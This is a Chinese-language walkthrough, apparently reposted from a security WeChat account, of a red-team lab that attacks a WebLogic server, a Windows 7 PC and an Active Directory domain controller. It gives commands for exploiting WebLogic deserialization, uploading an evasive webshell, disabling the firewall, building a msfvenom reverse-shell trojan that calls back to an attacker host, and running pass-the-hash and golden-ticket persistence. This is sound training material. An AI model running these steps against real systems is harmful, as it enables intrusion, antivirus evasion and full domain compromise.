ATT&CK红队评估(打靶过程超详细)

admin 2024年11月11日19:55:44评论8 views字数 2967阅读9分53秒阅读模式

介绍

红队实战系列,主要以真实企业环境为实例搭建一系列靶场。本次红队环境主要Access Token利用、

WMI利用、域漏洞利用SMB relay , EWS relay , PTT(PTC) , MS14-068 ,GPP ,SPN利用、黄金票据/白 银票据/Sid History/MOF等攻防技术。关于靶场统一登录密码:1qaz@WSX

1. Bypass UAC

2. Windows系统NTLM获取(理论知识:Windows认证)

3. Access Token利用(MSSQL利用)

4. WMI利用

5. 网页代理,二层代理,特殊协议代理(DNS , ICMP)

6. 域内信息收集

7. 域漏洞利用:SMB relay , EWS relay , PTT(PTC) , MS14-068 ,GPP ,SPN利用

8. 域凭证收集

9. 后门技术(黄金票据/白银票据/Sid History/MOF)

环境说明

内网网段:10.10.10.1/24

DMZ网段:192.168.111.1/24

测试机地址:192.168.111.1(Windows), 192.168.111.11( Linux)

防火墙策略(策略设置过后,测试机只能访问192段地址,模拟公网访问):

deny all tcp ports:10.10.10.1 allow all tcp ports:10.10.10.0/24

配置信息

DC

IP: [10.10.10.10](10.10.10.10)

OS:Windows 2012(64)

应用:AD域

WEB

IP1: [10.10.10.80](10.10.10.80)

IP2: [192.168.111.80](192.168.111.80)

OS:Windows 2008(64)

应用:Weblogic 10.3.6 MSSQL 2008

PC

IP1: [10.10.10.201](10.10.10.201)

IP2: [192.168.111.201](192.168.111.201)

OS:Windows 7(32)

环境搭建

*配置网卡*

增加一个仅主机网卡,网段是10.10.10.0段:

ATT&CK红队评估(打靶过程超详细)

*配置**DC*

ATT&CK红队评估(打靶过程超详细)

启动,并查看网络:

ATT&CK红队评估(打靶过程超详细)

配置web

ATT&CK红队评估(打靶过程超详细)

启动并检查网络:

注意登录域管账户才能进去:de1ayAdministrator  1qaz@WSX

登录进去如果要修改密码,统一修改为:Aa@123456 配置网络:

将net段设置为自动获取IP

ATT&CK红队评估(打靶过程超详细)

ATT&CK红队评估(打靶过程超详细)

然后测试:

ATT&CK红队评估(打靶过程超详细)

配置PC

ATT&CK红队评估(打靶过程超详细)

启动并检查网络:

将net段设置为自动获取IP:

ATT&CK红队评估(打靶过程超详细)

启动web服务

进入WBE到C:OracleMiddlewareuser_projectsdomainsbase_domainbin,使用管理员模式依次 执行脚本 :

ATT&CK红队评估(打靶过程超详细)

然后访问:

Weblogic登录界面:http://192.168.222.139:7001/console

ATT&CK红队评估(打靶过程超详细)

搞定。

*渗透*

渗透web

web IP: 192.168.222.139

端口扫描

nmap -sS 192.168.222.139

ATT&CK红队评估(打靶过程超详细)

端口都很熟悉

80:没有站点,什么都没有

135 , 139 ,445 可以考虑利用一波 1433:mssql

3389: 可以考虑远程 7001:weblogic

nmap探测漏洞

nmap 192.168.222.133 --script vuln

ATT&CK红队评估(打靶过程超详细)

有参考价值的。msf中好像没有对应的利用模块。

*永恒之蓝*

ATT&CK红队评估(打靶过程超详细)

失败。

搞weblogic

weblogic漏洞有点多,我们先收集一下

借助:https://github.com/dr0op/WeblogicScan 按照使用说明操作即可。

ATT&CK红队评估(打靶过程超详细)

通过下载或者git clone的方式下载下来,然后执行:

python3 WeblogicScan.py 192.168.222.139 7001

ATT&CK红队评估(打靶过程超详细)

还有一个工具也可以:

https://gitee.com/gid1314/weblogicScanner/

*CVE-2019-2725*

ATT&CK红队评估(打靶过程超详细)

像这种情况,有可能是因为有杀毒软件: 确实被拦截了

ATT&CK红队评估(打靶过程超详细)

我们尝试编码看是否能够OK 需要高级参数:

show advanced

ATT&CK红队评估(打靶过程超详细)

再次run:

ATT&CK红队评估(打靶过程超详细)

MSF自带的exp用不了,那就想其他办法。

哥斯拉拿webshell

这个地方借助java的反序列化利用工具:

https://github.com/shack2/javaserializetools/releases/tag/1.0.20190828

ATT&CK红队评估(打靶过程超详细)

解压执行:

java -jar Java反序列化漏洞利用工具V1.7.jar

ATT&CK红队评估(打靶过程超详细)

命令执行:

ATT&CK红队评估(打靶过程超详细)

利用起来应该没有问题。

接下来上传webshell,既然这个地方有360,那么我们需要有免杀功能的webshell,这里选择哥斯拉:

https://github.com/BeichenDream/Godzilla/releases/tag/v4.0.1-godzilla

下载解压执行:

java -jar godzilla.jar

直接生成免杀码:

ATT&CK红队评估(打靶过程超详细)

记住生成文件的位置,然后利用反序列化工具去上传木马!

ATT&CK红队评估(打靶过程超详细)

用哥斯拉进行链接webshell:

ATT&CK红队评估(打靶过程超详细)

关防火墙:

netsh advfirewall set allprofiles state off

ATT&CK红队评估(打靶过程超详细)

和MSF联动:

ATT&CK红队评估(打靶过程超详细)

然后哥斯拉上面回传:

ATT&CK红队评估(打靶过程超详细)

ATT&CK红队评估(打靶过程超详细)

搞定!!!

没找到windefend,那么把防火墙服务关了

ATT&CK红队评估(打靶过程超详细)

但是提不了权,这个shell有点鸡肋。。。。。。

*免杀工具*

还是得走免杀这步。。。。。

免杀工具有很多,但是不一定生效,这个大家一定要注意,因为病毒库一直在更新 Invoke-Obfuscation: https://github.com/danielbohannon/Invoke-Obfuscation

Ant-AntV:https://github.com/shellfeel/Ant-AntV CuiRi:https://github.com/NyDubh3/CuiRi

FourEye:https://github.com/lengjibo/FourEye

这些工具都可以去尝试。万一成功了呢。。。。。。

通过加壳的方式去生成一个木马:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.222.128 LPORT=9502 - x /home/kali/Desktop/soft/ScreenBrightness.exe -k -f exe > ss.exe

ATT&CK红队评估(打靶过程超详细)

直接通过CVE拿到shell:

ATT&CK红队评估(打靶过程超详细)

*提权*

ATT&CK红队评估(打靶过程超详细)

*内网信息收集*

会话转移给cs

将会话转移给CS进行收集:创建监听器:

ATT&CK红队评估(打靶过程超详细)

msf使用:

use exploit/windows/local/payload_inject

ATT&CK红队评估(打靶过程超详细)

*提权*

ATT&CK红队评估(打靶过程超详细)

*基本信息收集*

ATT&CK红队评估(打靶过程超详细)

*端口扫描*

顺带主机一起扫描

ATT&CK红队评估(打靶过程超详细)

*内网渗透*

*hashdump*

ATT&CK红队评估(打靶过程超详细)

*PTH*

DC开了445,先搞DC:

ATT&CK红队评估(打靶过程超详细)

先搞个SMB的监听器:

ATT&CK红队评估(打靶过程超详细)

拿下DC:

ATT&CK红队评估(打靶过程超详细)

相同的方式拿下PC:

ATT&CK红队评估(打靶过程超详细)

*权限维持*

*黄金票据*

先在DC中进行hashdump:

ATT&CK红队评估(打靶过程超详细)

拿到域的SID:

ATT&CK红队评估(打靶过程超详细)

用户名:Administrator
domain: de1ay.com
SID: S-1-5-21-2756371121-2868759905-3853650604-1001
krbtgt-hash: 82dfc71b72a11ef37d663047bc2088fb

在web上制作黄金票据:

ATT&CK红队评估(打靶过程超详细)

试试:

shell dir DCc$

ATT&CK红队评估(打靶过程超详细)

加下方WX,拉你一起进群学习

ATT&CK红队评估(打靶过程超详细)

原文始发于微信公众号(红队蓝军):ATT&CK红队评估(打靶过程超详细)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年11月11日19:55:44
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   ATT&CK红队评估(打靶过程超详细)https://cn-sec.com/archives/3385142.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息